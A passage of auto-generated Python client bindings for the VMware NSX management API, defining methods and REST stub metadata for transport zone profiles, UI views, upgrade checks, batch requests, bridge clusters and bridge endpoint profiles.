:class:`com.vmware.nsx.model_client.TransportZoneProfile`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'transport_zone_profile': transport_zone_profile,
})
def delete(self,
transportzone_profile_id,
):
"""
Deletes a specified transport zone profile.
:type transportzone_profile_id: :class:`str`
:param transportzone_profile_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'transportzone_profile_id': transportzone_profile_id,
})
def get(self,
transportzone_profile_id,
):
"""
Returns information about a specified transport zone profile.
:type transportzone_profile_id: :class:`str`
:param transportzone_profile_id: (required)
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.TransportZoneProfile
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.TransportZoneProfile`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'transportzone_profile_id': transportzone_profile_id,
})
def list(self,
cursor=None,
include_system_owned=None,
included_fields=None,
page_size=None,
resource_type=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about the configured transport zone profiles.
Transport zone profiles define networking policies for transport zones
and transport zone endpoints.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type include_system_owned: :class:`bool` or ``None``
:param include_system_owned: Whether the list result contains system resources (optional,
default to false)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type resource_type: :class:`str` or ``None``
:param resource_type: comma-separated list of transport zone profile types, e.g.
?resource_type=BfdHealthMonitoringProfile (optional)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.TransportZoneProfileListResult`
:return: com.vmware.nsx.model.TransportZoneProfileListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'include_system_owned': include_system_owned,
'included_fields': included_fields,
'page_size': page_size,
'resource_type': resource_type,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
transportzone_profile_id,
transport_zone_profile,
):
"""
Modifies a specified transport zone profile. The body of the PUT
request must include the resource_type.
:type transportzone_profile_id: :class:`str`
:param transportzone_profile_id: (required)
:type transport_zone_profile: :class:`vmware.vapi.struct.VapiStruct`
:param transport_zone_profile: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.TransportZoneProfile`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.TransportZoneProfile
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.TransportZoneProfile`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'transportzone_profile_id': transportzone_profile_id,
'transport_zone_profile': transport_zone_profile,
})
class TrustManagement(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.trust_management'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _TrustManagementStub)
self._VAPI_OPERATION_IDS = {}
def get(self):
"""
Returns information about the supported algorithms and key sizes.
:rtype: :class:`com.vmware.nsx.model_client.TrustManagementData`
:return: com.vmware.nsx.model.TrustManagementData
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get', None)
class UiViews(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.ui_views'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _UiViewsStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
view,
):
"""
Creates a new View.
:type view: :class:`com.vmware.nsx.model_client.View`
:param view: (required)
:rtype: :class:`com.vmware.nsx.model_client.View`
:return: com.vmware.nsx.model.View
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'view': view,
})
def delete(self,
view_id,
):
"""
Delete View
:type view_id: :class:`str`
:param view_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'view_id': view_id,
})
def get(self,
tag=None,
view_ids=None,
widget_id=None,
):
"""
If no query params are specified then all the views entitled for the
user are returned. The views to which a user is entitled to include the
views created by the user and the shared views.
:type tag: :class:`str` or ``None``
:param tag: The tag for which associated views to be queried. (optional)
:type view_ids: :class:`str` or ``None``
:param view_ids: Ids of the Views (optional)
:type widget_id: :class:`str` or ``None``
:param widget_id: Id of widget configuration (optional)
:rtype: :class:`com.vmware.nsx.model_client.ViewList`
:return: com.vmware.nsx.model.ViewList
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'tag': tag,
'view_ids': view_ids,
'widget_id': widget_id,
})
def get_0(self,
view_id,
):
"""
Returns Information about a specific View.
:type view_id: :class:`str`
:param view_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.View`
:return: com.vmware.nsx.model.View
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get_0',
{
'view_id': view_id,
})
def update(self,
view_id,
view,
):
"""
Update View
:type view_id: :class:`str`
:param view_id: (required)
:type view: :class:`com.vmware.nsx.model_client.View`
:param view: (required)
:rtype: :class:`com.vmware.nsx.model_client.View`
:return: com.vmware.nsx.model.View
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'view_id': view_id,
'view': view,
})
class Upgrade(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.upgrade'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _UpgradeStub)
self._VAPI_OPERATION_IDS = {}
def abortpreupgradechecks(self):
"""
Aborts execution of pre-upgrade checks if already in progress. Halts
the execution of checks awaiting execution at this point and makes
best-effort attempts to stop checks already in execution. Returns
without action if execution of pre-upgrade checks is not in progress.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('abortpreupgradechecks', None)
def executepostupgradechecks(self,
component_type,
):
"""
Run pre-defined checks to identify issues after upgrade of a component.
The results of the checks are added to the respective upgrade units
aggregate-info. The progress and status of post-upgrade checks is part
of aggregate-info of individual upgrade unit groups. Returns HTTP
status 500 with error code 30953 if execution of post-upgrade checks is
already in progress.
:type component_type: :class:`str`
:param component_type: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('executepostupgradechecks',
{
'component_type': component_type,
})
def executepreupgradechecks(self,
component_type=None,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Run pre-defined checks to identify potential issues which can be
encountered during an upgrade or can cause an upgrade to fail. The
results of the checks are added to the respective upgrade units
aggregate-info. The progress and status of operation is part of upgrade
status summary of individual components. Returns HTTP status 500 with
error code 30953 if execution of pre-upgrade checks is already in
progress.
:type component_type: :class:`str` or ``None``
:param component_type: Component type on which the action is performed or on which the
results are filtered (optional)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('executepreupgradechecks',
{
'component_type': component_type,
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def upgradeuc(self):
"""
Upgrade the upgrade coordinator module itself. This call is invoked
after user uploads an upgrade bundle. Once this call is invoked,
upgrade coordinator stops and gets restarted and target version upgrade
coordinator module comes up after restart.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('upgradeuc', None)
class _AssociationsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for list operation
list_input_type = type.StructType('operation-input', {
'associated_resource_type': type.StringType(),
'resource_id': type.StringType(),
'resource_type': type.StringType(),
'cursor': type.OptionalType(type.StringType()),
'fetch_ancestors': type.OptionalType(type.BooleanType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/associations',
path_variables={
},
query_parameters={
'associated_resource_type': 'associated_resource_type',
'resource_id': 'resource_id',
'resource_type': 'resource_type',
'cursor': 'cursor',
'fetch_ancestors': 'fetch_ancestors',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
operations = {
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'AssociationListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'list': list_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.associations',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _BatchStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'batch_request': type.ReferenceType('com.vmware.nsx.model_client', 'BatchRequest'),
'atomic': type.OptionalType(type.BooleanType()),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/batch',
request_body_parameter='batch_request',
path_variables={
},
query_parameters={
'atomic': 'atomic',
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BatchResponse'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.batch',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _BridgeClustersStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'bridge_cluster': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeCluster'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/bridge-clusters',
request_body_parameter='bridge_cluster',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'bridgecluster_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/bridge-clusters/{bridgecluster-id}',
path_variables={
'bridgecluster_id': 'bridgecluster-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'bridgecluster_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/bridge-clusters/{bridgecluster-id}',
path_variables={
'bridgecluster_id': 'bridgecluster-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/bridge-clusters',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'bridgecluster_id': type.StringType(),
'bridge_cluster': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeCluster'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/bridge-clusters/{bridgecluster-id}',
request_body_parameter='bridge_cluster',
path_variables={
'bridgecluster_id': 'bridgecluster-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeCluster'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeCluster'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeClusterListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeCluster'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.bridge_clusters',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _BridgeEndpointProfilesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'bridge_endpoint_profile': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpointProfile'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/bridge-endpoint-profiles',
request_body_parameter='bridge_endpoint_profile',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'bridgeendpointprofile_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/bridge-endpoint-profiles/{bridgeendpointprofile-id}',
path_variables={
'bridgeendpointprofile_id': 'bridgeendpointprofile-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'bridgeendpointprofile_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/bridge-endpoint-profiles/{bridgeendpointprofile-id}',
path_variables={
'bridgeendpointprofile_id': 'bridgeendpointprofile-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'edge_cluster_id': type.OptionalType(type.StringType()),
'failover_mode': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/bridge-endpoint-profiles',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'edge_cluster_id': 'edge_cluster_id',
'failover_mode': 'failover_mode',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'bridgeendpointprofile_id': type.StringType(),
'bridge_endpoint_profile': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpointProfile'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
